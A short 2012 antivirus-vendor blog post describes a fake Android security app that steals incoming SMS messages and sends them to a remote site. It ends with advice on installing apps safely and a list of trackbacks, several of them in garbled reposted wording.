June 15, 2012 By Nathan Collier

FakeAV for Android! There you are!

By Nathan Collier

Every super hero has an arch nemesis. For a lot of Threat Researchers, including myself, Rogue Security Products, or better known as FakeAV, is theirs. Back in the day when I was primarily a PC malware fighter, FakeAV was a prevalent threat that was always coming up with new ways to infect users nearly every other day. I knew it was only a matter of time that the same malware authors would turn mobile. I am afraid those days are upon us. How could I ever forget such an identifiable logo:

“Android Security Suite Premium”… yeah, right!  This spy which is being called Android.FakeSecSuit   retrieves incoming sms messages, extracts the phone number and message, and then sends the stolen info off:

As you can see in the GET command from the PCAP, highlighted in blue is the phone number and message I sent to my test phone now being sent off to a site.

Now that the developers of the popular FakeAV malware have entered into the mobile world expect to to see a lot more variations of this… and if they follow the same pattern as they did in the PC world, I mean A LOT! We are seeing it in Torrents and/or alternative markets. Remember, when downloading Android apps choose them wisely and download  from a trusted source. Check reviews, research the developer and verify  permissions requested before downloading. And of course, scan with Webroot SecureAnywhere Mobile.

Share Button

Trackbacks

  1. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  2. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  3. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  4. […] logo, » Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. « Now that the developers of the popular FakeAV malware […]

  5. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  6. […] Collier, a hazard investigate researcher during antivirus organisation Webroot, pronounced in a blog post about a new hazard on Friday. “Now that a developers of a renouned FakeAV malware have […]

  7. […] did not disclose where they had retrieved their APK samples; however, researchers over at Webroot found the Android Security Suite Premium app lurking in torrents and/or third-party Android […]

  8. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  9. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  10. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  11. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  12. […] identifiable logo," Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. "Now that the developers of the popular FakeAV malware have entered […]

  13. […] Collier, a hazard investigate researcher during antivirus organisation Webroot, pronounced in a blog post about a new hazard on Friday. “Now that a developers of a renouned FakeAV malware have […]

  14. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  15. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  16. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  17. […] logo,” Nathan Collier, a threat research analyst at antivirus firm Webroot, said in a blog post about the new threat on Friday. “Now that the developers of the popular FakeAV malware have […]

  18. […] Collier, a hazard investigate researcher during antivirus organisation Webroot, pronounced in a blog post about a new hazard on Friday. “Now that a developers of a renouned FakeAV malware have […]

  19. […] Collier, a hazard investigate researcher during antivirus organisation Webroot, pronounced in a blog post about a new hazard on Friday. “Now that a developers of a renouned FakeAV malware have […]

  20. […] Collier, a hazard investigate researcher during antivirus organisation Webroot, pronounced in a blog post about a new hazard on Friday. “Now that a developers of a renouned FakeAV malware have […]

  21. […] Collier, a hazard investigate researcher during antivirus organisation Webroot, pronounced in a blog post about a new hazard on Friday. “Now that a developers of a renouned FakeAV malware have […]

  22. […] part of the modern cybercrime ecosystem. From ATM skimmers with SMS notification next to fake antivirus scanners for Android users, the growth of the mobile malware segment is pretty […]

true